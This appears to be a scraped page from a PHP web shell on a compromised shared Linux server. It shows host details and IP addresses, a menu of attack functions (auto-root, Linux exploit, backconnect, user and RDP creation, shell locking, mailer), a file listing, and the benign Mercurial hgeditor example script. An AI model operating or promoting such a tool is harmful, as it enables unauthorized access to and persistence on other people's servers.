Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.20
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
mercurial-common /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
hgsh
[ DIR ]
drwxr-xr-x
vim
[ DIR ]
drwxr-xr-x
dumprevlog
1.37
KB
-rwxr-xr-x
hgeditor
1.2
KB
-rwxr-xr-x
hgweb.cgi
685
B
-rwxr-xr-x
hgweb.fcgi
669
B
-rwxr-xr-x
hgweb.wsgi
678
B
-rw-r--r--
mercurial.el
43.23
KB
-rw-r--r--
perf.py
114.23
KB
-rw-r--r--
python-hook-examples.py
633
B
-rw-r--r--
simplemerge
3.95
KB
-rw-r--r--
tcsh_completion
1.54
KB
-rw-r--r--
tcsh_completion_build.sh
1.91
KB
-rwxr-xr-x
undumprevlog
1.42
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : hgeditor
#!/bin/sh # # This is an example of using HGEDITOR to create of diff to review the # changes while committing. # If you want to pass your favourite editor some other parameters # only for Mercurial, modify this: case "${EDITOR}" in "") EDITOR="vi" ;; emacs) EDITOR="$EDITOR -nw" ;; gvim|vim) EDITOR="$EDITOR -f -o" ;; esac HGTMP="" cleanup_exit() { rm -rf "$HGTMP" } # Remove temporary files even if we get interrupted trap "cleanup_exit" 0 # normal exit trap "exit 255" HUP INT QUIT ABRT TERM HGTMP=$(mktemp -d ${TMPDIR-/tmp}/hgeditor.XXXXXX) [ x$HGTMP != x -a -d $HGTMP ] || { echo "Could not create temporary directory! Exiting." 1>&2 exit 1 } ( grep '^HG: changed' "$1" | cut -b 13- | while read changed; do "$HG" diff "$changed" >> "$HGTMP/diff" done ) cat "$1" > "$HGTMP/msg" MD5=$(which md5sum 2>/dev/null) || \ MD5=$(which md5 2>/dev/null) [ -x "${MD5}" ] && CHECKSUM=`${MD5} "$HGTMP/msg"` if [ -s "$HGTMP/diff" ]; then $EDITOR "$HGTMP/msg" "$HGTMP/diff" || exit $? else $EDITOR "$HGTMP/msg" || exit $? fi [ -x "${MD5}" ] && (echo "$CHECKSUM" | ${MD5} -c >/dev/null 2>&1 && exit 13) mv "$HGTMP/msg" "$1" exit $?
Close